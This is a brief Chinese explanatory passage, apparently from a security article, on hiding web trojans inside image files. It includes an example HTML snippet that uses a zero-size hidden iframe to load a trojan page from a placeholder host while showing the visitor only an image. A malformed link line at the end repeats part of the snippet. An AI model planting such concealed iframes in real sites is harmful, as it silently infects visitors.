随着防毒技术的发展,黑手段也不停地更新,图片木马技术逃避杀毒监视的新技术,攻击者将类似: http://www.xxx.com/test.htm中的木马代码植入到test.gif图片文件中,这些嵌入代码的图片都可以用工具生成,攻击者只需输入相关的选项就可以了,如图3。图片木马生成后,再利用代码调用执行,是比较新颖的一种挂马隐蔽方法,实例代码如:
<html>
<iframe src="http://www.xxx.com/test.htm" height=0 width=0> </iframe>
<img src="http://www.xxx.com/test.jpg"></center>
</html>
注:当用户打开http://www.xxx.com/test.htm是,显示给用户的是http://www.xxx.com/test.jpg,而http://www.xxx.com/test.htm网页代码也随之运行。(图3)
![http://www.xxx.com/test.jpg"></center](http://www.xxx.com/test.jpg"></center){kind=link}
